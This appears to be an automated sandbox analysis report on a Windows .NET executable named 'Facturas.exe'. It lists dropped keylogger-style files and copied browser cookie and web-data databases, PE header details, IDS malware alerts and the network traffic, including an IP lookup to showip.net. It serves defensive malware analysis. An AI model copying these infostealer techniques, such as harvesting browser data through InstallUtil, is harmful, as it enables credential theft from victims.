SSDEEP:	6:tOmwewewewew3nfw3nfw3nfw3nfw3nfw3nfw3nfx:tlwewewewew3fw3fw3fw3fw3fw3fw3fx
MD5:	B4391C19B9991FC1B74C94A883252066
SHA1:	E1C077A6428E900402727A6D9615E30538E4D6AB
SHA-256:	BDE12C94B19DF67834DAA92D6A26723A39A7E84D916EA6D776CF9A84A9022717
SHA-512:	33C1339B685729741D66F3262EE5FF0DF64EFDB969A14AD50352C5E375B79E9ED345B56F08140ECDAE4C19301D9240CBC95E5E80F2A81AA25C1F4C03176D6A8E
Malicious:	false
Preview:	..[03:13:44]<<Program Manager>>....[03:13:44]<<Program Manager>>....[03:13:44]<<Program Manager>>....[03:13:44]<<Program Manager>>....[03:13:44]<<Program Manager>>....[03:13:45]<<Program Manager>>....[03:13:45]<<Program Manager>>....[03:13:45]<<Program Manager>>....[03:13:45]<<Program Manager>>....[03:13:45]<<Program Manager>>....[03:13:45]<<Program Manager>>....[03:13:45]<<Program Manager>>..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDatatkwhzWpE.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	396
Entropy (8bit):	4.327024927351848
Encrypted:	false
SSDEEP:	12:tuwRwRwRwRwRwRwRwpCpwpCpwpCpwpCpx:t1
MD5:	69AB08EBE2BEE5E7742A63E1F8389365
SHA1:	D124A9A51420F821FB81E408EB2BBDB34F85F758
SHA-256:	7147BDB835005179B74F6A7C89A450246D721869233D7F632379332D25AB4AA9
SHA-512:	5837AE59277B83C5F176359C153669952D51E7A70FF3D5F46C024BA3CAB5CD326421E29CFADFBF4EB80731851BDB50A78D72BF62A0F0E61D8974C1B5D69EF1AB
Malicious:	false
Preview:	..[03:14:02]<<Program Manager>>....[03:14:02]<<Program Manager>>....[03:14:02]<<Program Manager>>....[03:14:02]<<Program Manager>>....[03:14:02]<<Program Manager>>....[03:14:02]<<Program Manager>>....[03:14:02]<<Program Manager>>....[03:14:02]<<Program Manager>>....[03:14:03]<<Program Manager>>....[03:14:03]<<Program Manager>>....[03:14:03]<<Program Manager>>....[03:14:03]<<Program Manager>>..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDatawyUxZCIx.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	396
Entropy (8bit):	4.249851857621194
Encrypted:	false
SSDEEP:	12:t1ENwcENwcENwcENwcXwcXwcXwcXwcXwcXwcXwcGNx:t1UUUUxxxxxxxGP
MD5:	A17E019E710150746AB90066D8BABF92
SHA1:	344B1A3965C96EC174FE94AA44B19EE7D3336DAD
SHA-256:	3768BE2960725605EBF2F0FA39016ECCF833FE214356CFCB0107F70108AB5227
SHA-512:	28EBEA3D61648982C7C22FAEF0CCEED26840949F800AFE148391EF038980799CC427261831A627E2C875CAA0B43C6E82FC79FFE2BBE8560F93B5ADFF3EAD4E8B
Malicious:	false
Preview:	..[03:13:12]<<Program Manager>>....[03:13:12]<<Program Manager>>....[03:13:12]<<Program Manager>>....[03:13:12]<<Program Manager>>....[03:13:13]<<Program Manager>>....[03:13:13]<<Program Manager>>....[03:13:13]<<Program Manager>>....[03:13:13]<<Program Manager>>....[03:13:13]<<Program Manager>>....[03:13:13]<<Program Manager>>....[03:13:13]<<Program Manager>>....[03:13:14]<<Program Manager>>..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataxcLNpFXH.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	396
Entropy (8bit):	4.34824145609028
Encrypted:	false
SSDEEP:	6:tOlpw9pwowowowowowowowfXpwfXpwfXpx:t8pw9pwowowowowowowowfZwfZwfZx
MD5:	138AD4D929DA3080234EFECE1E0678FD
SHA1:	3A0BE8451B2DDED7E68BAF0878D0E04D76B99625
SHA-256:	146DC8D22700259E861294ECD94976C5848935E77E326123A942CE837163E234
SHA-512:	A393BE2378B2B8BD63992ABC39D5CB7A6AA4A341751B27620E1F34797029AB08C7812278FCC39A142A9862F04A89EA520E9C0B2A777C4330C7B24B5901724959
Malicious:	false
Preview:	..[03:13:23]<<Program Manager>>....[03:13:23]<<Program Manager>>....[03:13:24]<<Program Manager>>....[03:13:24]<<Program Manager>>....[03:13:24]<<Program Manager>>....[03:13:24]<<Program Manager>>....[03:13:24]<<Program Manager>>....[03:13:24]<<Program Manager>>....[03:13:24]<<Program Manager>>....[03:13:25]<<Program Manager>>....[03:13:25]<<Program Manager>>....[03:13:25]<<Program Manager>>..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDatayYYgRewy.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	363
Entropy (8bit):	4.310680567856233
Encrypted:	false
SSDEEP:	6:tOQGwYGwYGwYGwYGwYGwYW4dpwYW4dpwYW4dpwYW4dpwYW4dpx:txGwYGwYGwYGwYGwYGwYXwYXwYXwYXwc
MD5:	ED21F5C11D533F61D7BADCA833BA23A6
SHA1:	D42886FDA38A8DDAFBF3CB29FA91B73D8A8200B8
SHA-256:	2748A7BC2621035141D94F95CD4B8218428B7B7FE04F509DD63B83355161D843
SHA-512:	73F9D88396F7A6EB007D9933D56EFFB1FE5DF6FB9FB493E32D64B9A8C5E167D9CBF86259688BC527EE870B22FF5C363C7925985A2201DB9E40E52E2FA33AB802
Malicious:	false
Preview:	..[03:13:52]<<Program Manager>>....[03:13:52]<<Program Manager>>....[03:13:52]<<Program Manager>>....[03:13:52]<<Program Manager>>....[03:13:52]<<Program Manager>>....[03:13:52]<<Program Manager>>....[03:13:53]<<Program Manager>>....[03:13:53]<<Program Manager>>....[03:13:53]<<Program Manager>>....[03:13:53]<<Program Manager>>....[03:13:53]<<Program Manager>>..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataytxpjpTS.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	396
Entropy (8bit):	4.338006027214467
Encrypted:	false
SSDEEP:	12:txQAdpwYQAdpwYQAdpwYQAdpwYqwYqwYqwYqwYqwYqwYqwYbx:t/rrrQ
MD5:	BBE0942FA32BAC17A541D87448F5A6AC
SHA1:	C3D9D58AAA99A6EC09EDDE13BA11AA300D6FAA56
SHA-256:	182BFB8E246F52A1098AFB7148A99BD09D8285A99443B8F80F8FFB071D00A504
SHA-512:	4ECEAFBB91981110D2219FC88A02C0967057C00A291B32BDADFF88E18D2394ADC8647ECF193736E071377EF543BB733DBC60E4E054DF33B636A2A38758E1BADA
Malicious:	false
Preview:	..[03:13:55]<<Program Manager>>....[03:13:55]<<Program Manager>>....[03:13:55]<<Program Manager>>....[03:13:55]<<Program Manager>>....[03:13:56]<<Program Manager>>....[03:13:56]<<Program Manager>>....[03:13:56]<<Program Manager>>....[03:13:56]<<Program Manager>>....[03:13:56]<<Program Manager>>....[03:13:56]<<Program Manager>>....[03:13:56]<<Program Manager>>....[03:13:57]<<Program Manager>>..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\LogabacusPqxXfnFffmMmEflyaway

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\WebData

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\cookies.db

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\cookies.db-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.989450017330232
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Facturas.exe
File size:	1'189'888 bytes
MD5:	af60907e3d43618d4db0730aef26e7dd
SHA1:	8afc3704d1053147ef397913ee55125d7b5f5c27
SHA256:	445b43c35311fcebb9f753c4572ba882d23cb73be51128f8fbb21c3af60db51e
SHA512:	475f9bebea668ba633015b7e09ab48951a348eaf324b9f7e000096d16e18737bdaacd3ff8a63831119413c4242236ff35a41634be66af157b380d25a6355cc84
SSDEEP:	24576:Q3gloMD5gDOid37+m+SVAtekU8rEZLI9LM2++tbPw6OV283BoW3:QyCTr+0VcA3ZLI9LMZxjrRf3
TLSH:	E3453310078D2662C3FA5979A5E0ABC45F38D1BF9757F203588E4200E5AE7DD4693AB3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...;..g.............................=... ...@....@.. ....................................`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x523dce
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x671AF13B [Fri Oct 25 01:15:39 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x123d84	0x4a	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x124000	0x59e	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x126000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x121dd4	0x121e00	46eeae35ee63416d3ac5f80d43b18bee	False	0.9872764728870203	data	7.991574593264377	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x124000	0x59e	0x600	accbcdeea4949eb5455a48fd0373b44f	False	0.4225260416666667	data	4.095778935684086	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x126000	0xc	0x200	036b452882788fb8d63ed36b63938aae	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x12405c	0x31c	data			0.43090452261306533
RT_MANIFEST	0x1243b4	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-25T09:12:06.154194+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49699	162.55.60.2	80	TCP
2024-10-25T09:12:30.955712+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49791	162.55.60.2	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 25, 2024 09:12:05.300023079 CEST	49699	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:05.305360079 CEST	80	49699	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:05.305444956 CEST	49699	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:05.306289911 CEST	49699	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:05.311582088 CEST	80	49699	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:06.154095888 CEST	80	49699	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:06.154194117 CEST	49699	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:06.154263020 CEST	80	49699	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:06.154273987 CEST	80	49699	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:06.154361963 CEST	49699	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:06.154645920 CEST	80	49699	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:06.154659033 CEST	80	49699	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:06.154751062 CEST	49699	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:06.155261040 CEST	80	49699	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:06.155272961 CEST	80	49699	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:06.155282974 CEST	80	49699	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:06.155328989 CEST	49699	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:06.155356884 CEST	49699	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:06.156208992 CEST	80	49699	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:06.156219959 CEST	80	49699	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:06.156339884 CEST	49699	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:06.156339884 CEST	49699	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:06.160324097 CEST	80	49699	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:06.160479069 CEST	49699	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:06.160583019 CEST	80	49699	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:06.160788059 CEST	80	49699	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:06.160799980 CEST	80	49699	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:06.160892010 CEST	49699	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:06.160892010 CEST	49699	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:06.282150984 CEST	80	49699	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:06.282224894 CEST	49699	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:06.282314062 CEST	80	49699	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:06.282326937 CEST	80	49699	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:06.282366991 CEST	49699	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:06.282677889 CEST	80	49699	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:06.282690048 CEST	80	49699	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:06.282736063 CEST	49699	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:06.283246994 CEST	80	49699	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:06.283309937 CEST	49699	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:06.283586025 CEST	80	49699	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:06.283597946 CEST	80	49699	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:06.283668995 CEST	49699	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:06.283955097 CEST	80	49699	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:06.283967018 CEST	80	49699	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:06.283977985 CEST	80	49699	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:06.284012079 CEST	49699	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:06.284028053 CEST	49699	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:06.284914970 CEST	80	49699	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:06.285027027 CEST	49699	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:30.067225933 CEST	49791	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:30.072814941 CEST	80	49791	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:30.072891951 CEST	49791	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:30.073005915 CEST	49791	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:30.079376936 CEST	80	49791	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:30.955615044 CEST	80	49791	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:30.955712080 CEST	49791	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:30.955734015 CEST	80	49791	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:30.955750942 CEST	80	49791	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:30.955800056 CEST	49791	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:30.956016064 CEST	80	49791	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:30.956033945 CEST	80	49791	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:30.956049919 CEST	80	49791	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:30.956063032 CEST	80	49791	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:30.956080914 CEST	80	49791	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:30.956089020 CEST	49791	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:30.956111908 CEST	49791	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:30.956124067 CEST	49791	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:30.956820011 CEST	80	49791	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:30.956840992 CEST	80	49791	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:30.956873894 CEST	49791	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:30.956888914 CEST	49791	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:30.961184978 CEST	80	49791	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:30.961288929 CEST	49791	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:30.961328030 CEST	80	49791	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:30.961419106 CEST	49791	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:30.961607933 CEST	80	49791	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:30.961658001 CEST	49791	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:31.082854986 CEST	80	49791	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:31.082937002 CEST	80	49791	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:31.082957029 CEST	80	49791	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:31.082964897 CEST	49791	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:31.082984924 CEST	49791	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:31.083009958 CEST	49791	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:31.083328009 CEST	80	49791	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:31.083343029 CEST	80	49791	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:31.083381891 CEST	49791	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:31.083609104 CEST	80	49791	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:31.083621979 CEST	80	49791	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:31.083673954 CEST	49791	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:31.083915949 CEST	80	49791	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:31.083991051 CEST	49791	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:31.084012032 CEST	80	49791	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:31.084024906 CEST	80	49791	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:31.084037066 CEST	80	49791	162.55.60.2	192.168.2.7
Oct 25, 2024 09:12:31.084049940 CEST	49791	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:12:31.084067106 CEST	49791	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:13:55.247301102 CEST	49699	80	192.168.2.7	162.55.60.2
Oct 25, 2024 09:13:55.253135920 CEST	80	49699	162.55.60.2	192.168.2.7
Oct 25, 2024 09:13:55.253235102 CEST	49699	80	192.168.2.7	162.55.60.2

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 25, 2024 09:12:05.281426907 CEST	62778	53	192.168.2.7	1.1.1.1
Oct 25, 2024 09:12:05.295269012 CEST	53	62778	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 25, 2024 09:12:05.281426907 CEST	192.168.2.7	1.1.1.1	0x96a6	Standard query (0)	showip.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 25, 2024 09:12:05.295269012 CEST	1.1.1.1	192.168.2.7	0x96a6	No error (0)	showip.net		162.55.60.2	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

showip.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49699	162.55.60.2	80	5652	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
Oct 25, 2024 09:12:05.306289911 CEST	58	OUT	GET / HTTP/1.1 User-Agent: Project1 Host: showip.net
